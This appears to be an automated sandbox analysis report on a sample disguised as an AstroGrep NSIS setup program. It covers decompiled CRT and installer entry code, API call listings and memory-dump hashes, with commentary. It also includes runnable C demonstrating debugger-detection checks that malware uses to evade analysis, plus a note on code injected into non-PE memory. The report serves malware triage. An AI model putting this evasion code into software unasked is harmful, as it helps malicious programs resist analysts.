                                                                                                             				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                                                                                                             					// ExceptionInformation[0] (+0x14) must carry one of the MSVC EH magic numbers.
                                                                                                             					_t17 =  *((intOrPtr*)(__esi + 0x14));
                                                                                                             					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                                                                                                             						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
                                                                                                             							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
                                                                                                             							if(_t37 != 0) {
                                                                                                             								// ExceptionInformation[1] (+0x18) is the pointer to the thrown object.
                                                                                                             								_t17 = E00A376E3(_t37,  *((intOrPtr*)(_t28 + 0x18)));
                                                                                                             								_t38 = _t17;
                                                                                                             								if(_t17 != 0) {
                                                                                                             									_push( *((intOrPtr*)(_t29 + 0x10)));
                                                                                                             									_push(_t28);
                                                                                                             									return E00A379BD(_t38);
                                                                                                             								}
                                                                                                             							}
                                                                                                             						}
                                                                                                             					}
                                                                                                             				}
                                                                                                             				return _t17;
                                                                                                             			}






                                                                                                             Statement addresses the decompiler mapped to the listing above, in listing order: 0x00a37c25, 0x00a37c28, 0x00a37c2e, 0x00a37c3c, 0x00a37c42, 0x00a37c4a, 0x00a37c56, 0x00a37c5e, 0x00a37c66, 0x00a37c7a, 0x00a37c7c, 0x00a37c80, 0x00a37c85, 0x00a37c8b, 0x00a37c8d, 0x00a37c8f, 0x00a37c92, 0x00000000, 0x00a37c99, 0x00a37c8d, 0x00a37c80, 0x00a37c7a, 0x00a37c66, 0x00a37c9a

                                                                                                            APIs
                                                                                                              • Part of subcall function 00A3770A: __getptd.LIBCMT ref: 00A37710
                                                                                                              • Part of subcall function 00A3770A: __getptd.LIBCMT ref: 00A37720
                                                                                                            • __getptd.LIBCMT ref: 00A37C34
                                                                                                              • Part of subcall function 00A33F5E: __getptd_noexit.LIBCMT ref: 00A33F61
                                                                                                              • Part of subcall function 00A33F5E: __amsg_exit.LIBCMT ref: 00A33F6E
                                                                                                            • __getptd.LIBCMT ref: 00A37C42
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                             • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp
                                                                                                             • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp
                                                                                                             • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp
                                                                                                             • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                            • String ID: csm
                                                                                                            • API String ID: 803148776-1018135373
                                                                                                            • Opcode ID: 9f9b1aa9a7291755015e8beb81bd7059a7d13f40e4deb95a1576ac4f54237fda
                                                                                                            • Instruction ID: 7f52f4f91532d6bbfcec40cb40d2018aa4a5c40a0f98372097cfec97c66608ea
                                                                                                            • Opcode Fuzzy Hash: 9f9b1aa9a7291755015e8beb81bd7059a7d13f40e4deb95a1576ac4f54237fda
                                                                                                            • Instruction Fuzzy Hash: 120181B5809305CFDF349F25C680AACB3B5BF11311F54542DF4456A651DB318980CF51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%
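The function above is statically linked CRT code (the APIs list resolves its callees to LIBCMT's __getptd), not logic written by the malware author: it decides whether an EXCEPTION_RECORD describes a C++ exception thrown by an MSVC runtime before it touches the thrown object. The C below is added here as a worked example and is not code from the report, from Joe Sandbox or from the sample. It reproduces that predicate on a constructed record using the x86 field layout the decompiled offsets imply (+0x00 ExceptionCode, +0x10 NumberParameters, +0x14 ExceptionInformation[0], +0x18 ExceptionInformation[1]) and shows why "csm" turns up in this function's Strings list. The struct is a mirror of the Win32 layout written here so the code builds without windows.h; the constants are MSVC's ehdata.h values; classify and exception_code_tag are names chosen for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* MSVC C++ exception tags (ehdata.h). 'msc' = 0x6D7363, OR'd with 0xE0000000. */
#define EH_EXCEPTION_NUMBER  0xE06D7363u
#define EH_PARAMS_X86        3u          /* NumberParameters for a 32-bit throw */
#define EH_MAGIC_NUMBER1     0x19930520u
#define EH_MAGIC_NUMBER2     0x19930521u
#define EH_MAGIC_NUMBER3     0x19930522u

/* Constructed mirror of the x86 EXCEPTION_RECORD: pointers are 32-bit so the
 * offsets match the ones read by the decompiled code (+0x00, +0x10, +0x14, +0x18). */
typedef struct {
    uint32_t ExceptionCode;            /* +0x00 */
    uint32_t ExceptionFlags;           /* +0x04 */
    uint32_t ExceptionRecord;          /* +0x08 nested record pointer */
    uint32_t ExceptionAddress;         /* +0x0c */
    uint32_t NumberParameters;         /* +0x10 */
    uint32_t ExceptionInformation[15]; /* +0x14: [0] magic, [1] thrown object, [2] ThrowInfo */
} x86_exception_record;

/* Same test the decompiled function applies before dereferencing the thrown object. */
int is_msvc_cxx_exception(const x86_exception_record *er)
{
    if (er->ExceptionCode != EH_EXCEPTION_NUMBER) return 0;
    if (er->NumberParameters != EH_PARAMS_X86) return 0;
    uint32_t magic = er->ExceptionInformation[0];
    return magic == EH_MAGIC_NUMBER1 || magic == EH_MAGIC_NUMBER2 || magic == EH_MAGIC_NUMBER3;
}

/* Builds a record from the three fields the filter inspects and classifies it. */
int classify(uint32_t code, uint32_t nparams, uint32_t magic)
{
    x86_exception_record er;
    memset(&er, 0, sizeof er);
    er.ExceptionCode = code;
    er.NumberParameters = nparams;
    er.ExceptionInformation[0] = magic;
    er.ExceptionInformation[1] = 0x00401000u; /* constructed: stands in for the thrown object */
    return is_msvc_cxx_exception(&er);
}

/* The low three bytes of the code as they sit in memory (little-endian): this is the
 * "csm" that the report's string scanner found next to this function. */
const char *exception_code_tag(uint32_t code)
{
    static char tag[4];
    tag[0] = (char)(code & 0xffu);
    tag[1] = (char)((code >> 8) & 0xffu);
    tag[2] = (char)((code >> 16) & 0xffu);
    tag[3] = '\0';
    return tag;
}

int main(void)
{
    printf("C++ throw, magic1:     %d\n", classify(EH_EXCEPTION_NUMBER, 3, EH_MAGIC_NUMBER1));
    printf("C++ throw, x64 params: %d\n", classify(EH_EXCEPTION_NUMBER, 4, EH_MAGIC_NUMBER1));
    printf("access violation:      %d\n", classify(0xC0000005u, 2, 0));
    printf("string tag of 0x%08X: \"%s\"\n", EH_EXCEPTION_NUMBER, exception_code_tag(EH_EXCEPTION_NUMBER));
    return 0;
}
```

When triaging a decompile, the 0xE06D7363 / 0x1993052x pair is a reliable marker for MSVC's C++ exception-handling support code, which can be skipped; the behaviour worth an analyst's time in this report is in the non-PE-backed region of process 3 rather than in these LIBCMT routines.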

                                                                                                            Executed Functions

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.250543287.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: <l$D0l
                                                                                                            • API String ID: 0-52272047
                                                                                                            • Opcode ID: 49702be116a9c2351fbd818cd1a01bc7409ac5117b8520f9b64474fe371e5650
                                                                                                            • Instruction ID: 835613f89797e2d4072e3f0bc60d0c0ea61c69188c06f20dddd031e6d2820130
                                                                                                            • Opcode Fuzzy Hash: 49702be116a9c2351fbd818cd1a01bc7409ac5117b8520f9b64474fe371e5650
                                                                                                            • Instruction Fuzzy Hash: 16A1B935F042188BCB08ABB4A8547BE76B7BFC9704B25892ED446DB385DF34CC05A791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.250543287.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: <l
                                                                                                            • API String ID: 0-2278483159
                                                                                                            • Opcode ID: 6b854a349eb6b8455270a5062868ec62ac5a2d5d82e98ee9b9f616b35b347f95
                                                                                                            • Instruction ID: 969788f9fe4786b9081b3a9c81afb0c93f64d49b7c9b6304a6f7334204224880
                                                                                                            • Opcode Fuzzy Hash: 6b854a349eb6b8455270a5062868ec62ac5a2d5d82e98ee9b9f616b35b347f95
                                                                                                            • Instruction Fuzzy Hash: 43D16A71E002198FCB14DFA8D484AAEFBF2FF88314F15855AE915AB351DB34AD46CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • CheckRemoteDebuggerPresent.KERNELBASE(00000000,?), ref: 00F2D64F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.250543287.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                                            • String ID:
                                                                                                            • API String ID: 3662101638-0
                                                                                                            • Opcode ID: b6eb7dcd61505f9ce7daad8ecbe51c89b5ffc89879f554bf96ec39236087dfcc
                                                                                                            • Instruction ID: c591fb7bd6d9401e9f637e744cfbd23124ed66b9581f7a728877f0284a675c57
                                                                                                            • Opcode Fuzzy Hash: b6eb7dcd61505f9ce7daad8ecbe51c89b5ffc89879f554bf96ec39236087dfcc
                                                                                                            • Instruction Fuzzy Hash: 0E2148B19042198FCB10CF9AD885BEEBBF4AF49324F15846AE459B7340D778A944CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%
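The functions listed for process 3 sit at 0x00F20000 in memory that is not backed by a PE image (based on PE: false), that is, code unpacked or injected at run time, and two of them call CheckRemoteDebuggerPresent, the behaviour the Overview flags as "Contains functionality to check if a debugger is running". The C below is added here as an example and is not code from the report or from the sample. It shows what that check amounts to on Windows (the same API pair the report names) and, as a generalization the page does not discuss, the equivalent check on Linux; debugger_present and tracer_pid_from_status are names chosen for the example, and SAMPLE_STATUS is a constructed /proc/self/status excerpt used to exercise the parser offline.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
#endif

/* Constructed excerpt of a Linux /proc/self/status as seen under a ptrace debugger (pid 4242). */
static const char SAMPLE_STATUS[] =
    "Name:\tpayload\n"
    "State:\tt (tracing stop)\n"
    "TracerPid:\t4242\n"
    "Uid:\t1000\t1000\t1000\t1000\n";

/* Returns the tracer pid from a /proc/<pid>/status buffer (0 = not traced, -1 = field missing). */
int tracer_pid_from_status(const char *status_text)
{
    const char *p = strstr(status_text, "TracerPid:");
    if (p == NULL) return -1;
    return (int)strtol(p + strlen("TracerPid:"), NULL, 10);
}

/* The check the report flags. On Windows IsDebuggerPresent reads PEB.BeingDebugged, while
 * CheckRemoteDebuggerPresent asks the kernel for ProcessDebugPort, so it also catches a
 * debugger that cleared the PEB flag. On Linux, ptrace attachment is the analogue. */
int debugger_present(void)
{
#ifdef _WIN32
    BOOL remote = FALSE;
    if (IsDebuggerPresent()) return 1;
    if (CheckRemoteDebuggerPresent(GetCurrentProcess(), &remote) && remote) return 1;
    return 0;
#else
    char buf[4096];
    FILE *f = fopen("/proc/self/status", "r");
    if (f == NULL) return 0; /* no procfs: nothing to ask */
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    return tracer_pid_from_status(buf) > 0;
#endif
}

int main(void)
{
    printf("tracer pid in constructed sample: %d\n", tracer_pid_from_status(SAMPLE_STATUS));
    printf("debugger attached to this process: %d\n", debugger_present());
    return 0;
}
```

Both Windows calls are cheap to defeat from a debugger (clear PEB.BeingDebugged, hook NtQueryInformationProcess or patch the branch on the return value), which is why the report treats the call as an evasion indicator rather than a protection; for detection, the API call matters in combination with the non-PE-backed code region and the other signatures in the Overview, not on its own.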

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.250543287.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 37bf32b2af21fc66849cfddd3f94aa18e0f57e0b9b3bd8be433052dfe62e7af5
                                                                                                            • Instruction ID: 683b9b47456942537aa79ca4e2fb5215246e88fa020f63df0cbc1ba78ff891c2
                                                                                                            • Opcode Fuzzy Hash: 37bf32b2af21fc66849cfddd3f94aa18e0f57e0b9b3bd8be433052dfe62e7af5
                                                                                                            • Instruction Fuzzy Hash: AEB17C70E043198FDB10EFA9D8857EEBBF2AF88324F148129E815A7354EB749845DF81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.250543287.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a230e22d1794eb9e8144ff6091165a236013c56081391b44a1114de9a46328eb
                                                                                                            • Instruction ID: 88c9185274f111b787c67b659f8082fee8b922fda3022e7596662e1a006bb0a5
                                                                                                            • Opcode Fuzzy Hash: a230e22d1794eb9e8144ff6091165a236013c56081391b44a1114de9a46328eb
                                                                                                            • Instruction Fuzzy Hash: A6B18D70E01229CFDB10DFA9E8857DDBBF2BF88794F148129E415A7294DB349846DB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNELBASE(?), ref: 00F24E6F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.250543287.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 1029625771-0
                                                                                                            • Opcode ID: 3e8a3fdf9b7a80647ca6a8afb1253a4a9758c438bba494cb68c0476bdbc3fba0
                                                                                                            • Instruction ID: 73e56dc6ea9ec988fcd3362b418009c9999ff6fdc608374131b18cb56671e126
                                                                                                            • Opcode Fuzzy Hash: 3e8a3fdf9b7a80647ca6a8afb1253a4a9758c438bba494cb68c0476bdbc3fba0
                                                                                                            • Instruction Fuzzy Hash: B64148B1D006688FEB10CFA9D88579EBBF1FB48314F118129E814EB344D7B4A846CF91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNELBASE(?), ref: 00F24E6F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.250543287.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 1029625771-0
                                                                                                            • Opcode ID: 27910b763d5690e6465f3de299dc7dae87e619ba8cb8bb04abf484ff50760496
                                                                                                            • Instruction ID: a4aa5d64383ffeab9d5704f9945f89a5d4c139b7c29bf79c2926c23b995594ae
                                                                                                            • Opcode Fuzzy Hash: 27910b763d5690e6465f3de299dc7dae87e619ba8cb8bb04abf484ff50760496
                                                                                                            • Instruction Fuzzy Hash: 57413BB1D006688FEB10CFA9D98579EBBF1FB48314F158529D814E7344D7B4A846CF91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • CheckRemoteDebuggerPresent.KERNELBASE(00000000,?), ref: 00F2D64F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.250543287.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                                            • String ID:
                                                                                                            • API String ID: 3662101638-0
                                                                                                            • Opcode ID: 38a6c153344acbc9631f67fd2c998204896d872f7b4ecd0fe48955806614dcb9
                                                                                                            • Instruction ID: 43f69301ed4c58a3ba4018a20b7e24207633f4cde82720bf7806e78cbb054e3a
                                                                                                            • Opcode Fuzzy Hash: 38a6c153344acbc9631f67fd2c998204896d872f7b4ecd0fe48955806614dcb9
                                                                                                            • Instruction Fuzzy Hash: C22164B1C042198FCB10CFAAD884BEEBBF4AF48324F15842AE459B3341C7789945CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.250543287.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2cc4ab3ee6b6e486d41d72810d67351c3556f780a3055d62a150bc6ccfe96785
                                                                                                            • Instruction ID: 715a66a46bc6cc5bc428e4f6a7066ef349cb9f1c4440c9337d217c759c056c56
                                                                                                            • Opcode Fuzzy Hash: 2cc4ab3ee6b6e486d41d72810d67351c3556f780a3055d62a150bc6ccfe96785
                                                                                                            • Instruction Fuzzy Hash: 4A916970E08319CFDF10EFA9D9817DEBBF2AF88314F148129E804A7294EB749845DB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Executed Functions

                                                                                                            C-Code - Quality: 86%
                                                                                                            			_entry_() {
                                                                                                            				intOrPtr _t45;
                                                                                                            				CHAR* _t49;
                                                                                                            				char* _t52;
                                                                                                            				CHAR* _t54;
                                                                                                            				void* _t58;
                                                                                                            				intOrPtr _t60;
                                                                                                            				int _t61;
                                                                                                            				int _t64;
                                                                                                            				signed int _t65;
                                                                                                            				int _t66;
                                                                                                            				signed int _t68;
                                                                                                            				void* _t92;
				signed int _t108;
				void* _t111;
				void* _t116;
				intOrPtr* _t117;
				char _t120;
				signed int _t139;
				signed int _t140;
				int _t148;
				void* _t149;
				intOrPtr* _t151;
				CHAR* _t154;
				CHAR* _t155;
				void* _t157;
				char* _t158;
				void* _t161;
				void* _t162;
				char _t184;

				// Reader note on this listing: it is the entry code of a stock NSIS installer stub
				// (the "NSIS Error" caption and the "AstroGrep v4.4.7 Setup" title below). Where a
				// call takes a global string buffer, the decompiler has printed the buffer's run-time
				// contents (paths under C:\Users\hardz\...) instead of the buffer address.
				// _t162+0x10 holds a pointer to an error message; it is 0 on the success path.
				 *(_t162 + 0x18) = 0;
				 *((intOrPtr*)(_t162 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t162 + 0x20) = 0;
				 *(_t162 + 0x14) = 0x20;
				// 0x8001 = SEM_FAILCRITICALERRORS | SEM_NOOPENFILEERRORBOX
				SetErrorMode(0x8001); // executed
				// E004060C8(n) resolves an API by index at run time (NSIS myGetProcAddress). The flag
				// value 0xc00 = LOAD_LIBRARY_SEARCH_SYSTEM32 | LOAD_LIBRARY_SEARCH_USER_DIRS is the
				// SetDefaultDllDirectories call the stock stub makes to harden the DLL search path.
				if(GetVersion() != 6) {
					_t117 = E004060C8(0);
					if(_t117 != 0) {
						 *_t117(0xc00);
					}
				}
				// Pre-load a NUL-separated list of DLLs from System32 (NSIS DLL-hijacking mitigation).
				// The list continues past "UXTHEME"; the decompiler shows only its first entry.
				_t154 = "UXTHEME";
				do {
					E0040605A(_t154); // executed
					_t154 =  &(_t154[lstrlenA(_t154) + 1]);
				} while ( *_t154 != 0);
				E004060C8(9);
				_t45 = E004060C8(7);
				 *0x42e404 = _t45;
				// comctl32.dll ordinal 17 = InitCommonControls (takes no argument; _t157 is a leftover register)
				__imp__#17(_t157);
				__imp__OleInitialize(0); // executed
				 *0x42e4b8 = _t45;
				// flags 0, 0x160 = sizeof(SHFILEINFOA); the result is not used, this only initialises shell32
				SHGetFileInfoA(0x428828, 0, _t162 + 0x38, 0x160, 0); // executed
				// E00405D2F(dst, src) is a string copy; the first argument is a global buffer
				E00405D2F("AstroGrep v4.4.7 Setup", "NSIS Error");
				_t49 = GetCommandLineA();
				_t158 = "\"C:\\Users\\hardz\\AppData\\Local\\Temp\\ASTROGREP_SETUP_V4.4.7.EXE\" ";
				E00405D2F(_t158, _t49);
				 *0x42e400 = GetModuleHandleA(0);
				_t52 = _t158;
				// The decompiler inlined the buffer pointer here; the real test is *_t158 == '"',
				// i.e. whether argv[0] on the command line is quoted.
				if("\"C:\\Users\\hardz\\AppData\\Local\\Temp\\ASTROGREP_SETUP_V4.4.7.EXE\" " == 0x22) {
					 *(_t162 + 0x14) = 0x22;
					_t52 =  &M00434001;
				}
				// E004057CC(str, ch) returns a pointer to the first ch or to the terminating NUL.
				// Skip argv[0]; _t162+0x1c remembers where the switches start.
				_t54 = CharNextA(E004057CC(_t52,  *(_t162 + 0x14)));
				 *(_t162 + 0x1c) = _t54;
				// Switch scanner: tokens are space-delimited or double-quoted. Recognised switches are
				// /S, /NCRC and /D= (see the inline notes below); anything else is skipped.
				while(1) {
					_t120 =  *_t54;
					_t167 = _t120;
					if(_t120 == 0) {
						break;
					}
					__eflags = _t120 - 0x20;
					if(_t120 != 0x20) {
						L10:
						__eflags =  *_t54 - 0x22;
						 *(_t162 + 0x14) = 0x20;
						if( *_t54 == 0x22) {
							_t54 =  &(_t54[1]);
							__eflags = _t54;
							 *(_t162 + 0x14) = 0x22;
						}
						__eflags =  *_t54 - 0x2f;
						if( *_t54 != 0x2f) {
							L22:
							// not a switch: skip to the end of this token
							_t54 = E004057CC(_t54,  *(_t162 + 0x14));
							__eflags =  *_t54 - 0x22;
							if(__eflags == 0) {
								_t54 =  &(_t54[1]);
								__eflags = _t54;
							}
							continue;
						} else {
							_t54 =  &(_t54[1]);
							// 0x53 = 'S': the /S (silent) switch, compared case-sensitively
							__eflags =  *_t54 - 0x53;
							if( *_t54 != 0x53) {
								L17:
								// 4-byte compare of the text after '/' with "NCRC" (the decompiler shows
								// the constant assembled byte by byte from 0x409181..0x409183)
								__eflags =  *_t54 - ((( *0x409183 << 0x00000008 |  *0x409182) << 0x00000008 |  *0x409181) << 0x00000008 | "NCRC");
								if( *_t54 != ((( *0x409183 << 0x00000008 |  *0x409182) << 0x00000008 |  *0x409181) << 0x00000008 | "NCRC")) {
									L21:
									// 4-byte compare of the text starting two characters back with " /D=":
									// the switch must be preceded by a space, so a quoted "/D=..." never matches.
									__eflags =  *((intOrPtr*)(_t54 - 2)) - ((( *0x40917b << 0x00000008 |  *0x40917a) << 0x00000008 |  *0x409179) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t54 - 2)) == ((( *0x40917b << 0x00000008 |  *0x40917a) << 0x00000008 |  *0x409179) << 0x00000008 | " /D=")) {
										// Terminate the command line at the space and take everything after
										// '=' up to the end of the line as the install directory. This is why
										// /D= has to be the last switch and must not be quoted.
										 *((char*)(_t54 - 2)) = 0;
										__eflags =  &(_t54[2]);
										E00405D2F("C:\\Program Files (x86)\\AstroGrep",  &(_t54[2]));
										L27:
										// Temp directory probe 1: %TEMP%. E004030DE checks that the candidate
										// directory exists and is writable.
										_t155 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t155); // executed
										_t58 = E004030DE(_t167);
										_t168 = _t58;
										if(_t58 != 0) {
											L30:
											// The argument is a global buffer; "1033" is its content at decompile time.
											DeleteFileA("1033"); // executed
											// Read and verify the NSIS header/data block; returns an error string or 0.
											_t60 = E00402C66(_t170,  *(_t162 + 0x20)); // executed
											 *((intOrPtr*)(_t162 + 0x10)) = _t60;
											if(_t60 != 0) {
												L40:
												// Control clearly continues after this call, so the decompiler has
												// misresolved its target; treat "ExitProcess()" here as unreliable.
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												_t180 =  *((intOrPtr*)(_t162 + 0x10));
												if( *((intOrPtr*)(_t162 + 0x10)) == 0) {
													// *0x42e494 is the "reboot requested" flag
													__eflags =  *0x42e494;
													if( *0x42e494 == 0) {
														L64:
														// *0x42e4ac is the script-set exit code; -1 means "not set"
														_t61 =  *0x42e4ac;
														__eflags = _t61 - 0xffffffff;
														if(_t61 != 0xffffffff) {
															 *(_t162 + 0x14) = _t61;
														}
														ExitProcess( *(_t162 + 0x14));
													}
													// Reboot path: 0x28 = TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY
													_t64 = OpenProcessToken(GetCurrentProcess(), 0x28, _t162 + 0x18);
													__eflags = _t64;
													_t148 = 2;
													if(_t64 != 0) {
														// enable SeShutdownPrivilege; _t148 = 2 = SE_PRIVILEGE_ENABLED
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t162 + 0x24);
														 *(_t162 + 0x38) = 1;
														 *(_t162 + 0x44) = _t148;
														AdjustTokenPrivileges( *(_t162 + 0x2c), 0, _t162 + 0x28, 0, 0, 0);
													}
													// Prefer a dynamically resolved shutdown API (InitiateShutdown-style
													// signature) with flags 0x25 = SHUTDOWN_FORCE_OTHERS | SHUTDOWN_RESTART |
													// SHUTDOWN_GRACE_OVERRIDE, else ExitWindowsEx with _t148 = 2 = EWX_REBOOT.
													// Reason 0x80040002 = SHTDN_REASON_MAJOR_APPLICATION |
													// SHTDN_REASON_MINOR_INSTALLATION | SHTDN_REASON_FLAG_PLANNED.
													_t65 = E004060C8(4);
													__eflags = _t65;
													if(_t65 == 0) {
														L62:
														_t66 = ExitWindowsEx(_t148, 0x80040002);
														__eflags = _t66;
														if(_t66 != 0) {
															goto L64;
														}
														goto L63;
													} else {
														_t68 =  *_t65(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t68;
														if(_t68 == 0) {
															L63:
															// script callback run when the reboot could not be started
															E0040140B(9);
															goto L64;
														}
														goto L62;
													}
												}
												// Error path: message box with the error text (0x10 = MB_ICONSTOP; the
												// high bits carry the default answer used in silent mode), then exit 2.
												E00405525( *((intOrPtr*)(_t162 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											// *0x42e41c is non-zero when this binary is an uninstaller
											if( *0x42e41c == 0) {
												L39:
												// exit code = -1 (unset) unless the script sets it; run the installer
												 *0x42e4ac =  *0x42e4ac | 0xffffffff;
												 *(_t162 + 0x18) = E004036AF( *0x42e4ac);
												goto L40;
											}
											// Uninstaller: look for the " _?=<instdir>" argument that the temp copy
											// receives; without it, copy ourselves to %TEMP%\~nsu[A].tmp and relaunch.
											_t151 = E004057CC(_t158, 0);
											if(_t151 < _t158) {
												L36:
												_t177 = _t151 - _t158;
												 *((intOrPtr*)(_t162 + 0x10)) = "Error launching installer";
												if(_t151 < _t158) {
													_t149 = E004054A8(_t180);
													lstrcatA(_t155, "~nsu");
													if(_t149 != 0) {
														lstrcatA(_t155, "A");
													}
													lstrcatA(_t155, ".tmp");
													// Do not recurse if we are already running from that temp directory
													// (the decompiler shows the run-time contents of the exe-directory buffer).
													_t160 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
													if(lstrcmpiA(_t155, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
														_push(_t155);
														if(_t149 == 0) {
															E0040548B();
														} else {
															E0040540E();
														}
														SetCurrentDirectoryA(_t155);
														// _t184 is the first byte of the install-directory buffer (0x43 = 'C');
														// if it is empty, the exe directory becomes the install directory.
														_t184 = "C:\\Program Files (x86)\\AstroGrep"; // 0x43
														if(_t184 == 0) {
															E00405D2F("C:\\Program Files (x86)\\AstroGrep", _t160);
														}
														E00405D2F(0x42f000,  *(_t162 + 0x1c));
														// Try 26 candidate names: the letter at 0x42f400 runs 'A'..'Z' and is
														// expanded into the child-name/command templates stored in the NSIS
														// header at +0x120 and +0x124 (E00405D51 expands such templates).
														_t135 = "A";
														_t161 = 0x1a;
														 *0x42f400 = "A";
														do {
															E00405D51(0, 0x428428, _t155, 0x428428,  *((intOrPtr*)( *0x42e410 + 0x120)));
															DeleteFileA(0x428428);
															// CopyFileA source is the module path buffer (run-time contents shown);
															// the copy is scheduled for deletion at reboot (E00405BEA) and launched
															// (E004054C0 returns a process handle); success clears the error.
															if( *((intOrPtr*)(_t162 + 0x10)) != 0 && CopyFileA("C:\\Users\\hardz\\AppData\\Local\\Temp\\ASTROGREP_SETUP_V4.4.7.EXE", 0x428428, 1) != 0) {
																E00405BEA(_t135, 0x428428, 0);
																E00405D51(0, 0x428428, _t155, 0x428428,  *((intOrPtr*)( *0x42e410 + 0x124)));
																_t92 = E004054C0(0x428428);
																if(_t92 != 0) {
																	CloseHandle(_t92);
																	 *((intOrPtr*)(_t162 + 0x10)) = 0;
																}
															}
															 *0x42f400 =  *0x42f400 + 1;
															_t161 = _t161 - 1;
														} while (_t161 != 0);
														// the ~nsu[A].tmp directory itself is also scheduled for deletion at reboot
														E00405BEA(_t135, _t155, 0);
													}
													goto L40;
												}
												// " _?=" found: terminate the command line before it and validate the path
												 *_t151 = 0;
												_t152 = _t151 + 4;
												if(E0040588F(_t177, _t151 + 4) == 0) {
													goto L40;
												}
												E00405D2F("C:\\Program Files (x86)\\AstroGrep", _t152);
												E00405D2F("C:\\Program Files (x86)\\AstroGrep", _t152);
												 *((intOrPtr*)(_t162 + 0x10)) = 0;
												goto L39;
											}
											// scan backwards from the end of the command line for the 4 bytes " _?="
											_t108 = (( *0x40915b << 0x00000008 |  *0x40915a) << 0x00000008 |  *0x409159) << 0x00000008 | " _?=";
											while( *_t151 != _t108) {
												_t151 = _t151 - 1;
												if(_t151 >= _t158) {
													continue;
												}
												goto L36;
											}
											goto L36;
										}
										// Temp directory probe 2: %WINDIR%\Temp
										GetWindowsDirectoryA(_t155, 0x3fb);
										lstrcatA(_t155, "\\Temp");
										_t111 = E004030DE(_t168);
										_t169 = _t111;
										if(_t111 != 0) {
											goto L30;
										}
										// Temp directory probe 3: %TEMP%Low (low-integrity temp), exported as TEMP/TMP
